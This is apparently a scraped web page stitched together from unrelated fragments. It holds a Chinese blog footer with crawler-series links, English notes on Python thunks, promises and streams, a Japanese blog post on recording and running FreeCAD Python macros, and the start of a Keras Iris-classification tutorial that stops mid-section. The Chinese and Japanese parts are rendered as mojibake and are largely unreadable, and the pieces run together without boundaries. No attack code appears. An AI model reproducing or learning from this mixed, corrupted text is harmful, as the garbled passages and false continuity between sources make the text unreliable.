妿æ¨è§å¾æ¬æè¿ä¸éï¼æ¬¢è¿å享/æèµæ¬æãæèµå¹¶éè¦ä»ä¸è·å¾æ¶çï¼èæ¯å¸æç¥éç§å¦ç©ºé´è·å¾äºå¤å°è¯»è
ççå¿å
³æ³¨ãå½ç¶ï¼å¦æä½ æ è§å®ï¼ä¹ä¸ä¼å½±åä½ çé
读ã忬¡è¡¨ç¤ºæ¬¢è¿åæè°¢ï¼
妿æ¨éè¦å¼ç¨æ¬æï¼è¯·åèï¼
èåæ. (Jun. 07, 2017). ãéç¨ç¬è«æ¢ç´¢ï¼ä¸ï¼ï¼ææå±ç¤ºä¸ä»£ç ã[Blog post]. Retrieved from https://spaces.ac.cn/archives/4430
ä½ ä¹è®¸è¿å¯¹ä¸é¢çå 容æå ´è¶£
ç§å¦ç©ºé´æµè§æåï¼FAQï¼
ç½ç«æ´æ°è®°å½ï¼2018å¹´01æï¼
å¢å¼ºtypechoçæç´¢åè½
éç¨ç¬è«æ¢ç´¢ï¼äºï¼ï¼è½å®å°è®ºåç¬åä¸
éç¨ç¬è«æ¢ç´¢ï¼ä¸ï¼ï¼éç¨ä¸è¬ç½ç«çç¬è«
å¦ä½âæâç«ï¼ææææä½ ç¬ç¾åº¦ç¾ç§ï½
ç§å¦ç©ºé´æ·»å æ°ååkexue.fm
2017å¹´å¿«ä¹ï¼Responsive Geekg for Typecho
ç§å¦ç©ºé´â微信群|è天æºå¨äººâä¸çº¿æµè¯
ç®åçè¿ é·VIPè´¦å·è·åå¨ï¼Pythonï¼
|
This is a series of notes taken from the Coursera course: “Programming Language” by professor Dan Grossman. I plan to chain these notes up with the catchy terms that I learnt from the course.
From our last discussion of higher order functions, functions can be evaluated, stored and passed as arguments just as other variables. Storing a function (closure) into a variable means something new to the code paths: it means we get to delay evaluation of some routines of your code until they are needed.
Starting from a dumb example, that we want to define our own if statement in python. Notice thatthe syntax and semantics of if require the condition variable to be evaluated as boolean, andthe true/false statements to be first evaluated, and returned.
# Mimics # if cond: # texpr # else: # fexpr # Ignore the case where texpr not a callable def myif (cond, texpr, fexpr): return texpr() if cond else fexpr()
Now we use myif in a Fibonnaci series calculation:
def myfib(n): return myif( n == 1 or n == 2, lambda: 1, lambda: myfib(n-1) + myfib(n-2) )
Some interesting observation here: when myfib is invoked, the arguments are two higher orderfunctions, not just two expressions. This is because when myif is called, we don’t know whichcode path will be excuted yet, so we want to delay their execution until appropriate. The twocode paths are wrapped in a 0-argument, anonymous function, which is often called as thunk.
Next, a few common programming idioms related to thunk and delayed execution is introduced.
Promises, delay/force
When we have some large computation to work on, but do not know if it is required to do so, weusually wrap such operations inside a thunk. Combining it with memoization, we could create apromise strcuture.
def delay(f): return [False, None, f] def force(f_promise): if not f_promise[0]: f_promise[0] = True f_promise[1] = f() return f_promise[1] else: return f_promise[1]
delay creates a promise, which is a mutable list where the first indicates whether the thunkis used or not, the second saves the result and the third is the thunk that contains the largecomputation. force check whether the thunk is evaluated. If not, set the execution flag to beTrue, it would evaluate the thunk, memoize the evaluation result, then return the result.
Stream
A stream is an infinitely long sequence of values. Computer memories are finite so it cannot actually store infinite amount of values on the memory. To define a stream strcuture, we make use of thunks to wrap a stream generator into the stream structure.
The following code constructs a stream object that produces all natural numbers:
def make_nat_stream(): def make_n_stream(n): return (n, lambda: make_n_stream(n+1)) return make_n_stream(0)
Stream is defined as a tuple, where the first element is the value. THe second is a generatorthat produces the next natural number. When make_n_stream is first invoked, a closure iscreated for the second element of the tuple. The clsoure contains the binding for the argumentof the next recursive call to make_n_stream, which is n+1, the next natural number.
Example usage:
s0 = make_nat_stream() # (0, thunk) s1 = s0[1]() # (1, thunk) s2 = s1[1]() # (2, thunk) ...
|
FreeCAD繧剃スソ縺�蟋九a繧狗炊逕ア
CAD縺ョ蜍牙シキ繧定�ェ鄙偵@縺溘>縺後�√�励Ο繝輔ぉ繝�繧キ繝ァ繝翫Ν莉墓ァ倥↑譛画侭繧ス繝輔ヨ縺ッ縲�鬮倅セ。縺ェ縺ョ縺ァ謇九r蜃コ縺帙↑縺�縲�
縺励g縺�縺後↑縺�縺ョ縺ァ縲√�熊ree CAD縲阪→縺九〒縲∵、懃エ「縺九¢縺溘i縲√◎縺ョ縺セ繧薙∪縲:reeCAD縺悟�コ縺ヲ縺阪◆縲�
繧�繧九��
繧、繝ウ繧ケ繝医�シ繝ゥ繝シ縺�222MB菴阪〒縲√う繝ウ繧ケ繝医�シ繝ォ縺吶k縺ィ548MB縺ォ縺ェ繧九��
繝舌�シ繧ク繝ァ繝ウ0.16.6706縺ッ縲∬ヲ句�コ縺励�ョ騾壹j縲�
蛻晁ヲ九�√ヤ繝シ繝ォ邉サ縺後←縺薙↓繧ゅ↑縺上�√�後◆縺�縺ョ繝薙Η繝シ繝ッ繝シ縺ェ縺ョ縺具シ�シ溘�阪→諤昴▲縺ヲ縺励∪縺」縺溘��
繧ケ繧ソ繝シ繝医@縺溘→縺阪↓陦ィ遉コ縺輔l繧狗判髱「縺ッ縲√え繧ァ繝悶�壹�シ繧ク縺ョ繧医≧縺ェ繝�繧カ繧、繝ウ縺ァ縲√Μ繝ウ繧ッ縺後◆縺上&繧楢イシ縺」縺ヲ縺ゅk譁�蟄励′縲∫ョ�譚。譖ク縺阪↓縺ェ縺」縺ヲ縺�繧九�ゅ�瑚ェャ譏取嶌縺阪�ッ隕九↑縺�縺ァ縺�縺倥k縲肴エセ�シ医◎縺励※縲√�瑚協蜉エ縺吶k縲肴エセ窶ヲ�シ峨↑縺ョ縺ァ縲∫┌隕悶@縺ヲ縲∵焔繧貞虚縺九@蟋九a繧九��
縲後Ρ繧ッ繝ッ繧ッ諢溘〒縲∝、ア隱ュ逞�縺ォ縺ェ縺」縺ヲ縺励∪縺�縲肴エセ縺ィ繧ゅ>縺�縲り�ェ蛻�縺ッ縲�
縺薙�ョ逕サ髱「縺ョ縺セ縺セ縺倥c縲∵桃菴懊〒縺阪↑縺�縺ョ縺ッ縲∝�縺九j蛻�縺」縺ヲ縺�繧九��
縲梧眠縺励>繝輔ぃ繧、繝ォ縲咲ウサ縺ョ繝懊ち繝ウ縺ァ縺ゥ縺�縺帙�ッ縺倥∪繧九s縺�繧搾シ溘♀繧翫c縲�
窶ヲ
縺医�ゅ↑縺ォ繧ウ繝ャ縲√ン繝・繝シ繝ッ繝シ�シ溘←縺�繧�縺」縺溘i繝「繝�繝ェ繝ウ繧ー縺ァ縺阪s縺ョ�シ�
縺�繧�縲√�昴う繝ウ繝医′謇薙※繧九◇�シ�
縺ゅs縺セ繧翫↓繧よゥ溯�ス縺悟、壹☆縺弱k縺溘a縺ォ縲√ラ繝ュ繝�繝励Μ繧ケ繝医〒縲√ヤ繝シ繝ォ繧貞�繧頑崛縺医↑縺後i騾イ繧√k莉墓ァ倥↑繧医≧縺ァ縺吶��
縺薙�ョ驕ク謚櫁い縺ョ莠九r縲√Ρ繝シ繧ッ繝吶Φ繝√→蜻シ縺カ縺昴≧縺ェ縲�
縺ィ繧翫≠縺医★繝ッ繝シ繧ッ繝吶Φ繝√�ッ縲.raft縺ィ縺九�‖rch�シ亥サコ遽会シ滂シ峨→縺九r驕ク繧薙□縲�
Path繧帝∈縺カ縺ィ縲�髮サ豌怜屓霍ッ縺ョ繝代せ繧呈緒縺�縺ヲ縺上l縺昴≧縺�縺励��
菴輔°濶イ縲�莉倥>縺ヲ繧九��
Sketch縺ィDraft縺ョ驕輔>縺悟�縺九▲縺ヲ縺�縺ェ縺�縲�
縺ゥ縺」縺。縺ィ繧ゅ�∫せ縲∫キ壹′謠上¢繧九��
縺ィ繧翫≠縺医★縲.raft縺ァ隧ヲ縺励◆縲�
縺ィ繧翫≠縺医★縲∝次轤ケ蠎ァ讓呻シ�0,0,0�シ峨r謇薙▽縲�
轤ケ縺梧遠縺ヲ繧具シ�
蜊倅ス阪�ッmm
蝓コ譛ャ繧ょ�縺九i縺ェ縺�縺セ縺セ縲√�槭け繝ュ縺ォ謇九r蜃コ縺吶��
繝槭け繝ュ縺ョ險倬鹸讖溯�ス縺後▽縺�縺ヲ繧九��
繝槭け繝ュ縺ィ縺�縺�縺九�√せ繧ッ繝ェ繝励ヨ縺ィ縺�縺�縺九�∽ス輔�ョ險�隱槭↑縺ョ縺句�縺九i縺ェ縺�縺励�:reeCAD蝗コ譛峨�ョ險�隱槭°繧ゅ@繧後↑縺�縺娯�ヲ
閾ェ蛻�縺ョ謗ィ貂ャ縺梧ュ」縺励¢繧後�ー縲√%繧後�ッ縲ヾhade縺ョ繧ケ繧ッ繝ェ繝励ヨ縺ョ縲瑚ィ俶�カ縲阪→縲∝酔縺俶ゥ溯�ス縺ェ縺ッ縺壺�ヲ
縺、縺セ繧翫�;UI縺ョ繝懊ち繝ウ繧偵♀縺励◆繧翫@縺ヲ謫堺ス懊@縺溷��螳ケ繧偵�√お繝�繧」繧ソ縺倶ス輔°縺ォ閾ェ蜍戊ィ倬鹸縺励※縺上l繧九��
縲後�槭け繝ュ繧定ィ倬鹸縺吶k縺溘a縺ョ繝�繧、繧「繝ュ繧ー繧帝幕縺上�阪�懊ち繝ウ縺ァ縲∬ィ倬鹸髢句ァ九��
菫晏ュ倥☆繧句�エ謇�縺梧が縺�縺ョ縺九��
縲梧怙蛻昴↓菫晏ュ倥☆繧句�エ謇�繧帝∈繧薙〒縺上□縺輔>縲阪→陦ィ遉コ縺輔l繧九��
縺薙≧縺�縺�譎ゅ�ッ縲∫オ碁ィ謎ク翫�√→繧翫≠縺医★縲√ョ繧ケ繧ッ繝医ャ繝励′讓ゥ髯千噪縺ォ繧ょ、ァ荳亥、ォ縺ェ縺ッ縺壹��
縺薙�ョ繧ィ繝ゥ繝シ縺ォ蠑輔▲縺九°縺」縺ヲ縲√�熊reeCAD縺、縺九∴縺ュ縺�繝シ縲阪→隲ヲ繧√◆莠コ繧ゅ>繧九�ョ縺ァ縺ッ縺ェ縺�縺�繧阪≧縺九��
縺ィ縺�縺�縺九�√%繧後�ッ縲:reeCAD縺ョGUI縺ョ繝�繧カ繧、繝ウ縺梧が縺�縲�
繧ゅ@縲∽ソ晏ュ倥☆繧句�エ謇�繧帝∈繧薙〒谺イ縺励>縺ョ縺ァ縺ゅl縺ー縲∵怙蛻昴↓繝輔ぃ繧、繝ォ繝�繧、繧「繝ュ繧ー繧貞�コ迴セ縺輔○繧九∋縺阪��
繧ゅ@縺上�ッ縲√ヵ繧。繧、繝ォ蜷阪h繧翫b荳翫↓縲√ヵ繧ゥ繝ォ繝�驕ク謚槭ム繧、繧「繝ュ繧ー繧堤畑諢上@縺ヲ縲√ヵ繧ゥ繝ォ繝�驕ク謚槭☆繧九∪縺ァ縲�髱槭い繧ッ繝�繧」繝悶↓縺吶k縺ケ縺阪��
github縺ォ縺ゅ▲縺溘i縲∬�ェ蛻�縺ァ繧�縺」縺ヲ縺ソ繧医≧縺九→縺セ縺ァ縲∵�昴>謔ゥ繧�縲�
繧ウ繝槭Φ繝峨r遏・繧翫◆縺�讖溯�ス縺ョ繝懊ち繝ウ繧呈款縺礼オゅo縺」縺溘i縲∫キ代�ョ蝗幄ァ偵�懊ち繝ウ繧呈款縺吶→縲∬ィ倬鹸繧堤オゆコ�縺吶k縲�
險倬鹸縺輔l縺溘�槭け繝ュ繧堤キィ髮�縺励◆繧翫�∝ョ溯。後@縺溘j縺吶k縺溘a縺ォ縺ッ縲√Γ繝「蟶ウ縺ソ縺溘>縺ェ繝懊ち繝ウ繧呈款縺吶��
縺薙�ョ逕サ髱「縺九i縲√�槭け繝ュ縺ョ螳溯。後b縺ァ縺阪k縺昴≧縺ェ縲ゆサ翫�ッ縺セ縺�螳溯。後�ッ縺励↑縺�縲ゆサ翫�ッ縲√�檎キィ髮�繝懊ち繝ウ縲阪r謚シ縺吶��
縺吶k縺ィ縲√%繧薙↑諢溘§縺ョ逕サ髱「縺悟�コ縺溘�ッ縺壹��
縺薙�ョ繧�繧頑婿縺�縺ィ縲√お繝ゥ繝シ縺ッ縲∽ク九�ョ繧ケ繝�繝シ繧ソ繧ケ繝舌�シ縺ォ陦ィ遉コ縺輔l繧九��
繧ケ繧ッ繝ェ繝励ヨ縺ョ險倬鹸縺ョ菴輔′縺�縺�縺ョ縺九��
繧ウ繝槭Φ繝峨r遏・繧峨↑縺上※繧ゅ�√◎縺ョ讖溯�ス繧偵せ繧ッ繝ェ繝励ヨ縺ァ菴ソ縺�縺溘a縺ョ繧ウ繝槭Φ繝峨′繝斐Ο縺」縺ィ蜃コ縺ヲ縺上k縲�
竊�
API繝ェ繝輔ぃ繝ャ繝ウ繧ケ�シ育┌謨ー縺ォ縺ゅk繧ウ繝槭Φ繝峨r繧「繝ォ繝輔ぃ繝吶ャ繝磯��縺ォ髮�繧√◆縺�縺代�ョ縲√�励Ο繧ー繝ゥ繝槫髄縺代�ョ蜿冶ェャ�シ峨r隱ュ繧�蠢�隕√′縺ェ縺�縲�
竊�
GUI縺ョ謫堺ス懊〒縺ッ螳溽樟縺励↓縺上>辣ゥ髮代↑蜍穂ス懊r縲’or讒区枚縺ィ縺九→邨�縺ソ蜷医o縺帙※閾ェ蜍募喧縺ァ縺阪k縲�
縺溘→縺医�ー縲’or縺ァ豎コ縺セ縺」縺溷屓謨ー郢ー繧願ソ斐☆縺ォ縺ッ窶ヲ蠕瑚ソー縲�
迚ケ縺ォ縲√�悟コァ讓吶�ッ謨ー蠑上〒陦ィ縺帙k繧薙�ッ縺壹↑繧薙□縺代←縲√ヤ繝シ繝ォ縺檎┌縺�縲阪�碁幕逋コ閠�繧ゅ�√o縺悶o縺悶%縺ョ蜍穂ス懊r縺吶k縺溘a縺�縺代↓繝�繝シ繝ォ繧呈コ門y縺励※縺上l縺ェ縺�繧薙□繧阪≧縺ェ縺√�阪→縺�縺�繧医≧縺ェ繧ソ繧、繝励�ョ繧ケ繧ッ繝ェ繝励ヨ繧呈コ門y縺ァ縺阪k縲�
FreeCAD縺ョ繧ケ繧ッ繝ェ繝励ヨ縺ッ縲∵僑蠑オ蟄舌�ッ窶�*.FCMacro窶昴□縺代←縲∽クュ霄ォ縺ッpython縺�縺」縺溘��
繧�縺」縺ア繧慨hade縺ィ蜷後§隕�鬆倥〒縺ァ縺阪∪縺励◆縲�
python蜍牙シキ縺励※縺�縺ヲ繧医°縺」縺溘�ょ虚縺上◇�シ�
繝槭け繝ュ縺ョ險倬鹸縺ァ謗貞�コ縺輔l繧九ョ繝シ繧ソ縺ッ縺薙s縺ェ諢溘§縲�
# -*- coding: utf-8 -*-
# Macro Begin: C:¥Users¥yusuke¥Desktop¥aaa.FCMacro +++++++++++++++++++++++++++++++++++++++++++++++++
import FreeCAD
Draft.makePoint(0.0,1.0,3.0)
# Macro End: C:¥Users¥yusuke¥Desktop¥aaa.FCMacro +++++++++++++++++++++++++++++++++++++++++++++++++
諡。蠑オ蟄舌�ッ窶�.FCMacro窶昴〒縺励◆縺後�√�縺励m窶�.py窶昴�ョ譁ケ縺悟�縺九j繧�縺吶>縲�
荳∝ッァ縺ォ繧ゅ�ゞTF-8譁�蟄励さ繝シ繝峨�ョ謖�螳�
# -*- coding: utf-8 -*-
縺ィ縺九▽縺代※縺上l縺ヲ繧九@縲�
謾ケ陦後さ繝シ繝峨�ッLF縲�
Windoows縺ッ縲,R+LF縲�
Linux縺ッ縲´F縲�
縺薙%縺ッ縺。繧�縺」縺ィ豌励r莉倥¢縺溘>縲�
# 縺ッ縲√◎縺ョ陦後�ョ繧ウ繝。繝ウ繝医い繧ヲ繝医r諢丞袖縺吶k縲�
萓句、悶→縺励※縲∽ク�陦檎岼縺ョ# 縺ョ蝣エ蜷医�ッ縲∵枚蟄励さ繝シ繝峨�ョ謖�螳壹�ョ譎ゅ↓縲√%縺�縺�縺�譖ク縺肴婿縺後〒縺阪k縲�
隕∫せ縺�縺第嶌縺上→縲�
import FreeCAD
Draft.makePoint(0.0,1.0,3.0)
縺ィ縺ゅk縺娯�ヲ
import窶ヲ
import FreeCAD縺ィ縺�縺�縺ョ縺ッ縲�
python險�隱槭〒縲√Λ繧、繝悶Λ繝ェ�シ�python豬√↓縺�縺�謇�縺ョ繝「繧ク繝・繝シ繝ォ�シ峨r隱ュ縺ソ霎シ繧�縲�
C縺ァ縺�縺�繧、繝ウ繧ッ繝ォ繝シ繝峨�ョ莠九□縺ィ諤昴≧縲�
FreeCAD繧定ェュ繧薙□縺ョ縺ァ縲:reeCAD迚ケ譛峨�ョ繧ウ繝槭Φ繝峨′菴ソ縺医k繧医≧縺ォ縺ェ繧九��
Draft.makePoint(窶ヲ,)
FreeCAD縺ョ繧ウ繝槭Φ繝峨�ョ縲∫せ繧呈遠縺、讖溯�ス縺ィ縺励※縲.raft.makePoint(0.0,1.0,3.0)縺後≠繧九��
()縺ョ荳ュ霄ォ縺ョ謨ー蟄励→縺励※縲∝コァ讓凅yz繧抵シ�mm蜊倅ス阪〒�シ画欠螳壹☆繧九��
繧ウ繝ウ繝槭〒蛹コ蛻�縺」縺ヲ菴ソ縺」縺ヲ縺ュ縲�
縺溘□縺励��
蠑墓焚縺御ク�縺、縺ェ繧悦縺ョ縺ソ縲�
蠑墓焚縺御コ後▽縺ェ繧峨�』,y縺ョ縺ソ縺ィ縺励※繧ゆスソ縺医k縲�
蠑墓焚�シ郁恭隱槭〒縲‖rg縺ィ縺九�‖rgument縺ィ縺具シ峨▲縺ヲ縺�縺�縺ョ縺ッ縲�()縺ョ荳ュ縺ォ蜈・繧後k螟画焚縺ョ莠九〒縲�
螟画焚縺」縺ヲ縺�縺�縺ョ縺ッ縲∝�エ蜷医↓繧医▲縺ヲ縺ッ縲梧焚縲阪〒縺ッ縺ェ縺上※譁�蟄怜��(闍ア隱槭〒縺�縺�string�シ遺�拌bc窶晢シ峨→縺�)縺�縺」縺溘j縺吶k縲�
繧ゅ■繧阪s縲�髢「謨ーDraft.makePoint縺ッ縲∵焚蟄励r蠑墓焚縺ィ縺励※蜿励¢蜿悶k縺九i縲∵枚蟄怜�励r蜈・繧後k縺ィ縲�
>>> Draft.makePoint("aa")
Traceback (most recent call last): File "<input>", line 1, in <module>
File "X:¥ProgramData¥FreeCAD 0.16¥Mod¥Draft¥Draft.py", line 2420, in makePoint
_Point(obj,X,Y,Z) File "X:¥ProgramData¥FreeCAD 0.16¥Mod¥Draft¥Draft.py", line 5168, in __init__
obj.addProperty("App::PropertyDistance","X","Draft","Location").X = xBase.FreeCADError: FreeCAD exception thrown (syntax error)
縺ィ縺九�√お繝ゥ繝シ縺瑚ソ斐▲縺ヲ縺阪◆繧翫☆繧九��
縺薙�ョ繧オ繧、繝医〒縺ッ縲√す繝ウ繧ソ繝�繧ッ繧ケ繝上う繝ゥ繧、繝医�ョ迢ャ迚ケ縺ョ蜀�螳ケ縺ォ縺ェ縺」縺ヲ縺�繧九′縲:reeCAD縺ァ縺ッ縲√お繝ゥ繝シ縺ッ縲∝�ィ縺ヲ襍、縺ァ陦ィ遉コ縺輔l繧九��
繧ウ繝槭Φ繝峨▲縺ヲ譖ク縺�縺溘¢縺ゥ縲√∪縺≫�ヲ繧医¥縺ッ遏・繧峨↑縺�繧薙□縺代←縲∝シ墓焚繧貞女縺大叙縺」縺ヲ菴輔°霑斐☆縺ョ縺ァ縲√さ繝槭Φ繝峨�ョ莠九r縲�髢「謨ー(闍ア隱槭〒縺�縺�function)縺ィ隱ュ繧薙□繧翫@縺セ縺吶h縲�
繝槭け繝ュ縺ョ螳溯。後�ョ莉墓婿縺ッ荳峨▽
繝槭け繝ュ縺ィ繧ケ繧ッ繝ェ繝励ヨ繧偵#縺。繧�豺キ縺懊↓縺励※菴ソ縺」縺ヲ縺セ縺吶��
繧ゅ■繧阪s荳。閠�縺ョ蛹コ蛻・縺後▽縺�縺ヲ縺セ縺帙s縲�
蜷後§諢丞袖縺ァ縺励g�シ�
遏・諱オ陲九→縺九≠繧翫∪縺励◆縺娯�ヲ縺ゥ縺�縺ァ繧ゅ>縺�縺ィ諤昴▲縺ヲ隱ュ繧薙〒縺ェ縺�縲�
繝槭け繝ュ縺ョ螳溯。後�ョ莉墓婿縺ッ縲∽ク峨▽隕九▽縺代∪縺励◆縲�
繝溘ラ繝ェ縺ョ蜀咲函繝懊ち繝ウ
縺。縺ェ縺ソ縺ォ縲√%縺ョ繝懊ち繝ウ縺ッ縲√Δ繝�繝ェ繝ウ繧ー逕サ髱「縺ァ縺ッ髱槭い繧ッ繝�繧」繝厄シ医げ繝ャ繝シ繧「繧ヲ繝茨シ峨@縺溘∪縺セ縲ゅせ繧ッ繝ェ繝励ヨ縺ョ繧ィ繝�繧」繧ソ逕サ髱「縺ォ縺励↑縺�縺ィ縲√い繧ッ繝�繧」繝悶↓縺ェ繧峨↑縺�縲�
python繧、繝ウ繧ソ繝励Μ繧ソ縺ォ逶エ謗・蜈・蜉�
python繧、繝ウ繧ソ繝シ繝励Μ繧ソ繝シ縺ッ縲∬。ィ遉コ�シ槭ヱ繝阪Ν�シ柝ython 繧ウ繝ウ繧ス繝シ繝ォ縺ォ繝√ぉ繝�繧ッ縺ァ蜃コ縺帙k縲�
python繝ヲ繝シ繧カ繝シ縺ィ縺励※縺ッ縲∝�昴a縺九i蜃コ縺励※縺翫>縺ヲ縺サ縺励>豌励b縺吶k縲�
繝槭け繝ュ縺ョ螳溯。後ム繧、繧「繝ュ繧ー�シ茨シ�
螟壼�縺薙l縺�縺代□縺ィ諤昴≧縲�
繧ゅ@縺九☆繧九→縲:reeCAD閾ェ菴薙r縲�
Windows縺ョ繧ウ繝槭Φ繝峨Λ繧、繝ウ竊恥ython繧、繝ウ繧ソ繝励Μ繧ソ
縺九i謫堺ス懊〒縺阪k縺九b縺励l縺ェ縺�縺後�∬ゥヲ縺励※縺ェ縺�縲�
萓九∴縺ー縲’or讒区枚縺ァ縲∫┌謨ー縺ョ轤ケ繧偵�∽ク�螳壽擅莉カ縺ァ謇薙▽縲�
# -*- coding: utf-8 -*-
import FreeCAD
for a in [0,1,2,3,4,5]:
Draft.makePoint(a,0,0.)
轤ケ縺悟�コ縺ヲ譚・縺翫▲縺溪�ヲ�シ�
縺薙�ョ遞句コヲ縺ェ繧峨�∵ゥ溯�ス縺ィ縺励※縺、縺�縺ヲ縺�繧九¢縺ゥ縲√b縺」縺ィ邏ー縺九>譚。莉カ縺ァ繧ゅ�∬�ェ蛻�縺ァ險ュ螳壹〒縺阪k縲�
繧ェ繧、繝ゥ繝シ繧�繧九��
鬥ャ鮖ソ縺ョ荳�縺、隕壹∴縺ァ縺吶′縲√�後が繧、繝ゥ繝シ縺ァ譖ク縺�縺溘し繧、繝ウ縲√さ繧オ繧、繝ウ縺ョ隍�邏�謨ー繧�3D縺ァ窶ヲ縲阪▲縺ヲ縺ョ繧偵d繧九��
# -*- coding: utf-8 -*-
import math
import FreeCAD
euler = lambda n, k, N: math.e**(-1j*n*k*2.0*math.pi/float(N))
N = 64
k = 3
for i in range(N):
b = euler(i,k,N)
Draft.makePoint(i, b.real, b.imag)
縺ァ縺代◆縲�
髱「繧貞シオ縺」縺ヲ縺ソ繧九��
逕サ蜒上�ョ繧医≧縺ォ繧�縺」縺溘i縺ァ縺阪◆縲�
繝ッ繝シ繧ッ繝吶Φ繝}art縺ョ荳ュ縺ォ縺ゅk繝�繝シ繝ォ繧剃スソ縺」縺溘��
FreeCAD縺ョ繧、繝ウ繧ケ繝医�シ繝ォ縺ッ縲√〒縺阪l縺ー繝ュ繝シ繧ォ繝ォ縺ォ縺励◆縺�
FreeCAD繧偵う繝ウ繧ケ繝医�シ繝ォ縺吶k縺ィ縺阪�ッ縲√Ο繝シ繧ォ繝ォ縺ォ菫晏ュ倥@縺滓婿縺後>縺�縲�
閾ェ蛻�縺ッ縲√Ο繝シ繧ォ繝ォ縺ョ繧ケ繝壹�シ繧ケ縺檎強縺�驛ス蜷井ク翫�∝、夜ΚHDD縺ォFreeCAD繧偵う繝ウ繧ケ繝医�シ繝ォ縺励◆繧薙□縺代←縲√>縺。縺�縺。驕�縺�縲�
繝�繝シ繝ォ繧帝∈謚槭@縺溘j縲∫せ繧呈遠縺」縺溘j縺吶k縺溘�ウ縺ォ縲√Ρ繝ウ繝�繝ウ繝晞≦繧後k縲�
髟キ譎る俣菴ソ縺�縺ョ縺ァ縺ゅl縺ー縲√%縺ョ繧ソ繧、繝�繝ゥ繧ー縺ッ縲√°縺ェ繧願協逞帙��
縺ァ縺阪l縺ー縲√Ο繝シ繧ォ繝ォ繝�繧」繧ケ繧ッ縺ォ菫晏ュ倥&繧後◆縺励��
縲後ヮ繝シ繝�PC縲√�槭え繧ケ辟。縺励�阪〒謫堺ス懊☆繧九↑繧峨�√�槭え繧ケ險ュ螳壼ソ�鬆�
繝弱�シ繝�PC縺ィ縺�縺�縺九�√Λ繝�繝励ヨ繝�繝励→繧りィ�縺�縺セ縺吶′窶ヲ縲�
繝槭え繧ケ辟。縺励〒繧�繧九↑繧峨�∝ソ�隕√↓縺ェ繧九°繧ゅ@繧後↑縺�縲ら判髱「縺ョ蝗櫁サ「縲√せ繧ッ繝ュ繝シ繝ォ遲峨′縺ァ縺阪↑縺�縺ョ縺ァ縲√Δ繝�繝ェ繝ウ繧ー縺励↓縺上>縲ゑシ亥宵縲∽ク企擇縲∝コ暮擇縲∵ュ」髱「縺ェ縺ゥ縺ョ繧キ繝ァ繝シ繝医き繝�繝医r霄ォ縺ォ逹�縺代k縺溘a縺ォ縲∵覆縺医※繝槭え繧ケ繧貞ー√§繧九�ョ繧ゆク�縺、縺ョ謇九°繧ゅ@繧後↑縺�縲ゑシ�
繝槭え繧ケ繧ゅ�∽コ後�懊ち繝ウ縺ョ縺ァ縺ッ縺�繧√��
蜿ウ縺ィ蟾ヲ縺ョ髢薙↓縲∽クュ螟ョ縺ョ繧ケ繧ッ繝ュ繝シ繝ォ縺ョ繧�縺、縺後▽縺�縺ヲ縺ェ縺�縺ィ縺�繧√��
繝槭え繧ケ縺ョ險ュ螳壹�ッ縲√%縺薙r蜿ら�ァ縺励◆縺後��
縺薙≧繧�縺」縺溘��
縲後↑縺懊°縲≫�戳reeCAD窶昴′郢ー繧願ソ斐@繝�繧ヲ繝ウ繝ュ繝シ繝峨&繧後k縲阪→諤昴▲縺溘i窶ヲ
web繝悶Λ繧ヲ繧カ縺ョ縲√ち繝悶r豸医&縺ェ縺�繧ッ繧サ縺後≠縺」縺ヲ縲√ム繧ヲ繝ウ繝ュ繝シ繝峨し繧、繝医�ョ繝壹�シ繧ク繧帝幕縺�縺溘ち繝悶′縲√★縺」縺ィ谿九▲縺ヲ縺溘○縺�縺�縺」縺溘�ゆサ雁セ後�ッ縲√%縺�縺�縺�縺薙→縺檎┌縺�繧医≧縺ォ閾エ縺励∪縺励※蛟吮�ヲ
莉頑怦縺ッ濶イ縲�縺ゅ▲縺溘〒蛟吮�ヲ
譁ー縺励>莠九□繧峨¢縺ァ縲∬ャ阮ャ繧偵◆縺上&繧馴」イ繧薙□縺ァ蛟吮�ヲ縲ゆコ医a縲∽コ磯亟邱壹r蠑オ縺」縺ヲ縺�縺溘♀縺九£縺ァ縲∬ャ逧�縺ォ縺ッ縲∽ス輔→繧ゅ↑縺城℃縺斐○縺溘��
縺薙l縺九i繧ゅ�∽ス輔→縺九d縺」縺ヲ縺�縺代◎縺�縺ェ豌励′縺励※縺�縺セ縺励※蛟吶��
|
Join the Patreonto get
Exclusive Downloads,
Direct Support,
Early Access,
Voting Access, our
Books for Free, and so much more!
Contents
Overview
This will be the third article in a four-part series covering thefollowing:
Dataset analysis- We will present and discuss a dataset selected for our machine learning experiment. This will include some analysis and visualisations to give us a better understanding of what we're dealing with.
Experimental design- Before we conduct our experiment, we need to have a clear idea of what we're doing. It's important to know what we're looking for, how we're going to use our dataset, what algorithms we will be employing, and how we will determine whether the performance of our approach is successful.
Implementation- We will use the Keras API on top of TensorFlow to implement our experiment. All code will be in Python, and at the time of publishing everything is guaranteed to work within a Kaggle Notebook.
Results- Supported by figures and statistics, we will have a look at how our solution performed and discuss anything interesting about the results.
Implementation
In the last article we covered a number of experimental design issues and made some decisions for our experiments. We decided to compare the performance of two simple artificial neural networks on the Iris Flower dataset. The first neural network will be the control arm, and it will consist of a single hidden layer of four neurons. The second neural network will be the experimental arm, and it will consist of a single hidden layer of five neurons. We will train both of these using default configurations supplied by the Keras library and collect thirty accuracy samples per arm. We will then apply the Wilcoxon Rank Sums test to test the significance of our results.
A simple training and testing strategy
With our dataset analysis and experimental design complete, let's jump straight into coding up the experiments.
If your desired dataset is hosted on Kaggle, as it is with the Iris Flower Dataset, you can spin up a Kaggle Notebook easily through the web interface:
Creating a Kaggle Notebook with the Iris dataset ready for use.
You're also welcome to use your own development environment, provided you can load the Iris Flower dataset.
Import packages
Before we can make use of the many libraries available for Python, we need toimport them into our notebook. We're going to need numpy , pandas ,tensorflow , keras , and sklearn. Depending on your developmentenvironment these may already be installed and ready for importing. You 'llneed to install them if that's not the case.
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import tensorflow as tf # dataflow programming
from tensorflow import keras # neural networks API
from sklearn.model_selection import train_test_split # dataset splitting
If you're using a Kaggle Kernel notebook you can just update the default cell.Below you can see I've included imports for tensorflow , keras , andsklearn.
To support those using their own coding environment, I have listed the version numbers for the imported packages below:
tensorflow==1.11.0rc1
scikit-learn==0.19.1
pandas==0.23.4
numpy==1.15.2
Preparing the dataset
First, we load the Iris Flower dataset into a pandas DataFrame using the following code:
# Load iris dataset into dataframe
iris_data = pd.read_csv("/kaggle/input/Iris.csv")
Input parameters
Now, we need to separate the four input parameters from the classification labels. There are multiple ways to do this, but we're going to use pandas.DataFrame.iloc, which allows selection from the DataFrame using integer indexing.
